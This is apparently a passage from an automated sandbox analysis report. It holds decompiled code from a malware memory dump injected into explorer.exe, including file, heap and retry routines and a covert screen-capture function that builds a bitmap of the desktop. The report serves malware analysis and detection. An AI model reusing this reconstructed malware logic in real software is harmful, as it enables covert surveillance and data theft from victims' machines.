                                                                                                            				intOrPtr _t42;
                                                                                                            				char _t44;
                                                                                                            
                                                                                                            				_t32 = _a4;
                                                                                                            				_t44 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				if(_a4 != 0) {
                                                                                                            					_t29 = E032EB49B(_t32);
                                                                                                            					if(_t29 == 0) {
                                                                                                            						L12:
                                                                                                            						_t14 = 0;
                                                                                                            						L13:
                                                                                                            						L14:
                                                                                                            						return _t14;
                                                                                                            					}
                                                                                                            					_t15 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t42 =  *((intOrPtr*)(_t15 + 0xf4))(_t29, 0);
                                                                                                            					if(_t42 == 0) {
                                                                                                            						L10:
                                                                                                            						_t17 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						 *((intOrPtr*)(_t17 + 0x30))(_t29);
                                                                                                            						if(_t44 != 0) {
                                                                                                            							E032E8D86( &_v8, 0);
                                                                                                            						}
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					_t4 = _t42 + 1; // 0x1
                                                                                                            					_t44 = E032E8D70(_t4);
                                                                                                            					_v8 = _t44;
                                                                                                            					if(_t44 == 0) {
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					_t24 = E032EB509(_t29, _t44, _t42,  &_a4); // executed
                                                                                                            					if(_t24 == 0 || _a4 != _t42) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						_t25 = _a8;
                                                                                                            						 *((char*)(_t42 + _t44)) = 0;
                                                                                                            						if(_t25 != 0) {
                                                                                                            							 *_t25 = _t42;
                                                                                                            						}
                                                                                                            						FindCloseChangeNotification(_t29);
                                                                                                            						_t14 = _t44;
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t14 = 0;
                                                                                                            				goto L14;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,032F0C39,00000000,00000000,0330EFE0,032FC9D8,00000000,032FC9D8,00000000,00000000,?,00000046,00000000,052EF6B0,00000400), ref: 032EB5DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: c723165e6c273dda3efec71d559ef388db5c6b3b3bedf11dc2f9fb02362c63fc
                                                                                                            • Instruction ID: 8ae1fc3c5a718f241b78d43e79ed1064b2834c517a0c48f2ec752ee78bab11c7
                                                                                                            • Opcode Fuzzy Hash: c723165e6c273dda3efec71d559ef388db5c6b3b3bedf11dc2f9fb02362c63fc
                                                                                                            • Instruction Fuzzy Hash: AB110836628307AFCB11DFA9E985B6AB7ECEF44750F98406AF911CB240EB70D9408790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 196 32eb509-32eb522 197 32eb541-32eb54f ReadFile 196->197 198 32eb524-32eb528 197->198 199 32eb551-32eb555 197->199 200 32eb52a-32eb540 198->200 201 32eb556-32eb55b 198->201 200->197 202 32eb55f-32eb562 201->202 203 32eb55d 201->203 202->199 203->202
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,032EB5BE,00000000,00000000,?,032F0C39,00000000), ref: 032EB547
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 4a3cd483fb2bd6680f3aff5ffef3f4f08dadb7393b22e315517210b58e2a94d5
                                                                                                            • Instruction ID: 0aaea526bf327eb618e48d02360318f0249038049a04cc870327469d363d2317
                                                                                                            • Opcode Fuzzy Hash: 4a3cd483fb2bd6680f3aff5ffef3f4f08dadb7393b22e315517210b58e2a94d5
                                                                                                            • Instruction Fuzzy Hash: 34016D72621219FFDB10CEA9CC45BAB7BBCEB407A5F144069B819E7100E270EE40DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 204 32eca1b-32eca34 206 32eca38-32eca45 call 32eca04 204->206 207 32eca36-32eca37 204->207 210 32eca5b-32eca66 FindCloseChangeNotification 206->210 211 32eca47-32eca4a 206->211 214 32eca68-32eca6a 210->214 212 32eca4c-32eca51 211->212 213 32eca57-32eca59 211->213 212->213 213->214
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032ECA1B(void* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _t12;
                                                                                                            				void* _t13;
                                                                                                            				void* _t14;
                                                                                                            				void* _t17;
                                                                                                            				intOrPtr _t18;
                                                                                                            				void* _t23;
                                                                                                            
                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                            				_t12 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                            				if(_t13 != 0) {
                                                                                                            					_t14 = E032ECA04(); // executed
                                                                                                            					_t23 = _t14;
                                                                                                            					if(_t23 != 0) {
                                                                                                            						FindCloseChangeNotification(_v8);
                                                                                                            						_t17 = _t23;
                                                                                                            					} else {
                                                                                                            						if(_v8 != _t14) {
                                                                                                            							_t18 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                            						}
                                                                                                            						_t17 = 0;
                                                                                                            					}
                                                                                                            					return _t17;
                                                                                                            				} else {
                                                                                                            					return _t13;
                                                                                                            				}
                                                                                                            			}











                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4b0e765e2c58b4bf14c0d05c64f76f32ba50f597f0e0d8677145f1fbe1cdcef
                                                                                                            • Instruction ID: 541bdfdee822da1289b0bd4f5132255cc32aee5369dc471c527a35cf20153b0b
                                                                                                            • Opcode Fuzzy Hash: a4b0e765e2c58b4bf14c0d05c64f76f32ba50f597f0e0d8677145f1fbe1cdcef
                                                                                                            • Instruction Fuzzy Hash: C8F01732A20225EFCB10EBE4E90AA9D73E8FB08695F8440A4E501E7250E770DA40EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 215 32e8d86-32e8d8e 216 32e8dd3-32e8dd4 215->216 217 32e8d90-32e8d95 215->217 218 32e8d97-32e8da0 217->218 219 32e8dd2 217->219 220 32e8dab-32e8dae 218->220 221 32e8da2-32e8da9 call 32ea5da 218->221 219->216 223 32e8db7-32e8dcc call 32e8f0a RtlFreeHeap 220->223 224 32e8db0-32e8db2 call 32ea5f3 220->224 221->223 223->219 224->223
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032E8D86(char _a4, intOrPtr _a8) {
                                                                                                            				char _t3;
                                                                                                            				intOrPtr _t4;
                                                                                                            				void* _t9;
                                                                                                            
                                                                                                            				_t3 = _a4;
                                                                                                            				if(_t3 == 0) {
                                                                                                            					return _t3;
                                                                                                            				}
                                                                                                            				_t9 =  *_t3;
                                                                                                            				if(_t9 != 0) {
                                                                                                            					 *_t3 =  *_t3 & 0x00000000;
                                                                                                            					_t4 = _a8;
                                                                                                            					if(_t4 != 0xffffffff) {
                                                                                                            						if(_t4 == 0xfffffffe) {
                                                                                                            							_t4 = E032EA5F3(_t9);
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t4 = E032EA5DA(_t9);
                                                                                                            					}
                                                                                                            					E032E8F0A(_t9, 0, _t4);
                                                                                                            					_t3 = RtlFreeHeap( *0x32ff9c8, 0, _t9); // executed
                                                                                                            				}
                                                                                                            				return _t3;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 969390585e389984d24a5e6584bb9e3098a56e5bc02ddd07d0438bfef974c413
                                                                                                            • Instruction ID: aff84d4fcb5fe253f8031427f7586ccb69524a38f6f976a55a24d8d06c05e5f4
                                                                                                            • Opcode Fuzzy Hash: 969390585e389984d24a5e6584bb9e3098a56e5bc02ddd07d0438bfef974c413
                                                                                                            • Instruction Fuzzy Hash: 75F03732921615AFDB11A674EC02BAB37599F22F30F980355F5649A1D0D770A9C086D5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 229 32eb457-32eb47a CreateFileW 230 32eb47c-32eb47e 229->230 231 32eb480-32eb483 229->231 232 32eb497-32eb49a 230->232 233 32eb495 231->233 234 32eb485-32eb48e 231->234 233->232 234->233
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032EB457(WCHAR* __ecx, long __edx) {
                                                                                                            				intOrPtr _t6;
                                                                                                            				long _t12;
                                                                                                            				void* _t13;
                                                                                                            
                                                                                                            				_t12 = __edx;
                                                                                                            				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                                                                                            				if(_t13 != 0xffffffff) {
                                                                                                            					if(_t12 == 4) {
                                                                                                            						_t6 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						 *((intOrPtr*)(_t6 + 0x88))(_t13, 0, 0, 2);
                                                                                                            					}
                                                                                                            					return _t13;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,032E96EF), ref: 032EB472
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: f640a390e329b48db94e42a5823df319e18973a746a95dd19a8675fa3299ed4a
                                                                                                            • Instruction ID: 964049bf4472a1d6d428367039e381ba5448be816d722a97e3c5e52924d9119b
                                                                                                            • Opcode Fuzzy Hash: f640a390e329b48db94e42a5823df319e18973a746a95dd19a8675fa3299ed4a
                                                                                                            • Instruction Fuzzy Hash: 0AE09AB33101197EE320AAA8ACC9F7B269CE7896F9F4546B4FA15C7280C6208C404370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 235 32ec59c-32ec5b3 237 32ec5d4-32ec5d6 235->237 238 32ec5b5-32ec5c3 235->238 240 32ec5c8-32ec5d2 FindCloseChangeNotification 238->240 241 32ec5c5-32ec5c7 238->241 240->237 241->240
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E032EC59C(void* __ecx) {
                                                                                                            				intOrPtr _t4;
                                                                                                            				void* _t5;
                                                                                                            				intOrPtr _t6;
                                                                                                            				void* _t12;
                                                                                                            				void* _t13;
                                                                                                            
                                                                                                            				_t4 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            				_t13 = 0;
                                                                                                            				_t5 =  *((intOrPtr*)(_t4 + 0xc8))(2, 0, __ecx);
                                                                                                            				_t12 = _t5;
                                                                                                            				if(_t12 != 0) {
                                                                                                            					_t6 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_push(_t12);
                                                                                                            					if( *((intOrPtr*)(_t6 + 0xcc))() != 0) {
                                                                                                            						_t13 = 1;
                                                                                                            					}
                                                                                                            					FindCloseChangeNotification(_t12);
                                                                                                            					return _t13;
                                                                                                            				}
                                                                                                            				return _t5;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,032E4282,?,?,?,?,?,?,?,?,032E4367,00000000), ref: 032EC5CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 673597cea646bb877cd7c33495f02e24702ac7b7afa0f833d614f42cf3b197b3
                                                                                                            • Instruction ID: 5865f87ccde02e5a9ffee9807f47b0466c89233ca92e2d9ce059cbfb5500d90c
                                                                                                            • Opcode Fuzzy Hash: 673597cea646bb877cd7c33495f02e24702ac7b7afa0f833d614f42cf3b197b3
                                                                                                            • Instruction Fuzzy Hash: 3CE04F323111316FD360ABE9FC4DE777AA8EB85AA1B0A417CF909C7244DA20C802D7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 242 32eb49b-32eb4bb CreateFileW
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E032EB49B(WCHAR* __ecx) {
                                                                                                            				signed int _t5;
                                                                                                            
                                                                                                            				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                            				_t2 = _t5 + 1; // 0x1
                                                                                                            				asm("sbb ecx, ecx");
                                                                                                            				return _t5 &  ~_t2;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,032EB583,00000000,00000400,00000000,00000000,?,032F0C39,00000000,00000000), ref: 032EB4AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: bbf102e23430bad08383145e37f97e533414f67d8fc10d938cc8259817be7060
                                                                                                            • Instruction ID: d391b862b8c025016014a1a28f003c01ae18d74d1db6cce9ca6d348bd24a7a1f
                                                                                                            • Opcode Fuzzy Hash: bbf102e23430bad08383145e37f97e533414f67d8fc10d938cc8259817be7060
                                                                                                            • Instruction Fuzzy Hash: 60D012B13601007EFB1C9A24DC5AF71339CD700701F15055C7A02D60E0D555D9148710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 243 32e8d70-32e8d85 RtlAllocateHeap
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032E8D70(long _a4) {
                                                                                                            				void* _t2;
                                                                                                            
                                                                                                            				_t2 = RtlAllocateHeap( *0x32ff9c8, 8, _a4); // executed
                                                                                                            				return _t2;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 7ceb5f95fa3ef484f541bb06f460477a8ab1bb91271513b8e0cdb55d426c63e6
                                                                                                            • Instruction ID: 91b54f8e3f86b3e46937997f44b9542ebbf4b6ad0868c05ec2d2396ee552681d
                                                                                                            • Opcode Fuzzy Hash: 7ceb5f95fa3ef484f541bb06f460477a8ab1bb91271513b8e0cdb55d426c63e6
                                                                                                            • Instruction Fuzzy Hash: AFB09235080208FFCF012A81FD09A843F29EB44661F008021F60848064CB6364A09B94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 244 32e8d5b-32e8d6f HeapCreate
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032E8D5B() {
                                                                                                            				void* _t1;
                                                                                                            
                                                                                                            				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                            				 *0x32ff9c8 = _t1;
                                                                                                            				return _t1;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • HeapCreate.KERNELBASE(00000000,00096000,00000000,032E65BA), ref: 032E8D64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 10892065-0
                                                                                                            • Opcode ID: bc8581fff14f8a4d9690c522d2739f139a36e837172caa07d6eb06911a54295a
                                                                                                            • Instruction ID: 4c3e48ffa70a1165f4e73a1b3af950d0f215f3df1863224784cb70f40c2dcab6
                                                                                                            • Opcode Fuzzy Hash: bc8581fff14f8a4d9690c522d2739f139a36e837172caa07d6eb06911a54295a
                                                                                                            • Instruction Fuzzy Hash: E8B01270A81300FFDB502B207C4EB003520E340B12F208026F609982C8C7B010409518
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E032F0BA4(void* __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				char _v16;
                                                                                                            				char _v20;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _t27;
                                                                                                            				char _t28;
                                                                                                            				intOrPtr _t30;
                                                                                                            				void* _t32;
                                                                                                            				void* _t37;
                                                                                                            				char _t38;
                                                                                                            				intOrPtr _t39;
                                                                                                            				char _t42;
                                                                                                            				intOrPtr _t51;
                                                                                                            				intOrPtr* _t61;
                                                                                                            				intOrPtr _t64;
                                                                                                            				signed int _t71;
                                                                                                            				void* _t75;
                                                                                                            				void* _t78;
                                                                                                            				void* _t79;
                                                                                                            
                                                                                                            				_t27 =  *0x32ff8a4; // 0x52ef6b0
                                                                                                            				_t28 = E032E8D70( *((intOrPtr*)(_t27 + 4))); // executed
                                                                                                            				_v12 = _t28;
                                                                                                            				if(_t28 != 0) {
                                                                                                            					_t61 =  *0x32ff8a4; // 0x52ef6b0
                                                                                                            					if( *((intOrPtr*)(_t61 + 4)) > 0x400) {
                                                                                                            						E032E8E4D(_t28,  *_t61, 0x400);
                                                                                                            						_v8 = _v8 & 0x00000000;
                                                                                                            						_t37 = E032E109A(_t61, 0x46);
                                                                                                            						_t64 =  *0x32ff8e4; // 0x3310000
                                                                                                            						asm("sbb ecx, ecx");
                                                                                                            						_t38 = E032E9F8F(( ~( *(_t64 + 0xa8)) & 0x00000034) + 0xaaa, ( ~( *(_t64 + 0xa8)) & 0x00000034) + 0xaaa);
                                                                                                            						_push(0);
                                                                                                            						_push(_t37);
                                                                                                            						_v24 = _t38;
                                                                                                            						_push(0x32fc9d8);
                                                                                                            						_push(_t38);
                                                                                                            						_t39 =  *0x32ff8e4; // 0x3310000
                                                                                                            						_push(0x32fc9d8);
                                                                                                            						_v20 = E032E9BF7(_t39 + 0x1020);
                                                                                                            						_t42 = E032EB564(_t41,  &_v8); // executed
                                                                                                            						_v16 = _t42;
                                                                                                            						E032E8D41( &_v24);
                                                                                                            						E032E8D41( &_v20);
                                                                                                            						_t73 = _v16;
                                                                                                            						_t79 = _t78 + 0x3c;
                                                                                                            						_t71 = _v8;
                                                                                                            						if(_v16 != 0 && _t71 > 0x400) {
                                                                                                            							_t51 =  *0x32ff8a4; // 0x52ef6b0
                                                                                                            							if(_t71 >=  *(_t51 + 4)) {
                                                                                                            								_t71 =  *(_t51 + 4);
                                                                                                            							}
                                                                                                            							E032E8E4D(_v12 + 0x400, _t73 + 0x400, _t71 - 0x400);
                                                                                                            							_t71 = _v8;
                                                                                                            							_t79 = _t79 + 0xc;
                                                                                                            						}
                                                                                                            						E032E8D86( &_v16, _t71); // executed
                                                                                                            						E032E8D86( &_v20, 0xfffffffe);
                                                                                                            						_t28 = _v12;
                                                                                                            						_t78 = _t79 + 0x10;
                                                                                                            					}
                                                                                                            					_t75 = 0;
                                                                                                            					while(1) {
                                                                                                            						_t30 =  *0x32ff8e4; // 0x3310000
                                                                                                            						_t32 = E032EB604(_t30 + 0x228, _t28, 0x1000); // executed
                                                                                                            						_t78 = _t78 + 0xc;
                                                                                                            						if(_t32 >= 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						Sleep(1);
                                                                                                            						_t75 = _t75 + 1;
                                                                                                            						if(_t75 < 0x2710) {
                                                                                                            							_t28 = _v12;
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					E032E8D86( &_v12, 0);
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • Sleep.KERNELBASE(00000001,?,00000000,00000000,?,?,?,?,032F0AD2,?,?,?,032F0E97,00000000), ref: 032F0CCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeapSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4201116106-0
                                                                                                            • Opcode ID: 6f3f9a3eeb9a63f0983eddab440f5fa64d14fa190beed03fa39bdcfe8ba74985
                                                                                                            • Instruction ID: 3a7793acf23837fef8c2891a6f7ba54aaa16e2f690a5a3a0ccdb2f9c0122cb57
                                                                                                            • Opcode Fuzzy Hash: 6f3f9a3eeb9a63f0983eddab440f5fa64d14fa190beed03fa39bdcfe8ba74985
                                                                                                            • Instruction Fuzzy Hash: 91419676A10205BFDB04EBE4DD8AFAEB3BCEF04314F584179E605EB281D675A9808754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E032E5CC4(int* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				int _v16;
                                                                                                            				struct HWND__* _v20;
                                                                                                            				struct HWND__* _v24;
                                                                                                            				struct HDC__* _v28;
                                                                                                            				void* _v32;
                                                                                                            				int* _v36;
                                                                                                            				void* _v40;
                                                                                                            				void* _v44;
                                                                                                            				void* _v48;
                                                                                                            				void* _v52;
                                                                                                            				void* _v56;
                                                                                                            				intOrPtr _v60;
                                                                                                            				intOrPtr _v64;
                                                                                                            				intOrPtr _v68;
                                                                                                            				intOrPtr _v72;
                                                                                                            				intOrPtr _v76;
                                                                                                            				intOrPtr _v80;
                                                                                                            				short _v82;
                                                                                                            				short _v84;
                                                                                                            				signed int _v88;
                                                                                                            				signed int _v92;
                                                                                                            				struct tagBITMAPINFO _v96;
                                                                                                            				intOrPtr _v102;
                                                                                                            				int _v110;
                                                                                                            				char _v112;
                                                                                                            				void* _v116;
                                                                                                            				void* _v120;
                                                                                                            				void* _v124;
                                                                                                            				void* _v132;
                                                                                                            				void* _v136;
                                                                                                            				void* _v140;
                                                                                                            				int _v156;
                                                                                                            				signed int _v160;
                                                                                                            				void _v164;
                                                                                                            				int _t82;
                                                                                                            				void* _t84;
                                                                                                            				signed int _t92;
                                                                                                            				void* _t99;
                                                                                                            				char _t103;
                                                                                                            				intOrPtr _t113;
                                                                                                            				int* _t114;
                                                                                                            				struct HDC__* _t120;
                                                                                                            				signed int _t124;
                                                                                                            				short _t137;
                                                                                                            				struct HDC__* _t141;
                                                                                                            				void* _t144;
                                                                                                            				void* _t148;
                                                                                                            
                                                                                                            				_v36 = __ecx;
                                                                                                            				_v24 = 0;
                                                                                                            				_t120 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_t144 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				_t141 = GetDC(0);
                                                                                                            				_v28 = _t141;
                                                                                                            				if(_t141 != 0) {
                                                                                                            					_t120 = CreateCompatibleDC(_t141);
                                                                                                            					if(_t120 != 0) {
                                                                                                            						_v8 = GetDeviceCaps(_t141, 8);
                                                                                                            						_t82 = GetDeviceCaps(_t141, 0xa);
                                                                                                            						_v16 = _t82;
                                                                                                            						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
                                                                                                            						if(_t144 != 0) {
                                                                                                            							_t84 = SelectObject(_t120, _t144);
                                                                                                            							_v32 = _t84;
                                                                                                            							if(_t84 != 0) {
                                                                                                            								_t144 = SelectObject(_t120, _v32);
                                                                                                            								if(_t144 != 0) {
                                                                                                            									GetObjectW(_t144, 0x18,  &_v164);
                                                                                                            									_t92 = _v160;
                                                                                                            									_t124 = _v156;
                                                                                                            									_v92 = _t92;
                                                                                                            									_v84 = 1;
                                                                                                            									_t137 = 0x20;
                                                                                                            									_v82 = _t137;
                                                                                                            									_v96.bmiHeader = 0x28;
                                                                                                            									_v80 = 0;
                                                                                                            									_v76 = 0;
                                                                                                            									_v72 = 0;
                                                                                                            									_v68 = 0;
                                                                                                            									_v64 = 0;
                                                                                                            									_v60 = 0;
                                                                                                            									asm("cdq");
                                                                                                            									_v88 = _t124;
                                                                                                            									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
                                                                                                            									_t99 = E032E8D70(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
                                                                                                            									_v20 = _t99;
                                                                                                            									if(_t99 != 0) {
                                                                                                            										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
                                                                                                            										_v16 = _v8 + 0x36;
                                                                                                            										_t103 = E032E8D70(_v8 + 0x36);
                                                                                                            										_v12 = _t103;
                                                                                                            										if(_t103 != 0) {
                                                                                                            											_v110 = _v16;
                                                                                                            											_v112 = 0x4d42;
                                                                                                            											_v102 = 0x36;
                                                                                                            											E032E8E4D(_t103,  &_v112, 0xe);
                                                                                                            											E032E8E4D(_v12 + 0xe,  &_v96, 0x28);
                                                                                                            											E032E8E4D(_v12 + 0x36, _v20, _v8);
                                                                                                            											_t148 = _t148 + 0x24;
                                                                                                            											_v8 = _v8 & 0x00000000;
                                                                                                            											_t113 = E032EFC7B(_v12, _v16,  &_v8);
                                                                                                            											_v24 = _t113;
                                                                                                            											if(_t113 != 0) {
                                                                                                            												_t114 = _v36;
                                                                                                            												if(_t114 != 0) {
                                                                                                            													 *_t114 = _v8;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				E032E8D86( &_v20, 0);
                                                                                                            				E032E8D86( &_v12, 0);
                                                                                                            				if(_t120 != 0) {
                                                                                                            					DeleteDC(_t120);
                                                                                                            				}
                                                                                                            				if(_t141 != 0) {
                                                                                                            					DeleteDC(_t141);
                                                                                                            				}
                                                                                                            				if(_t144 != 0) {
                                                                                                            					DeleteObject(_t144);
                                                                                                            				}
                                                                                                            				return _v24;
                                                                                                            			}





















































                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 032E5CE3
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 032E5CF7
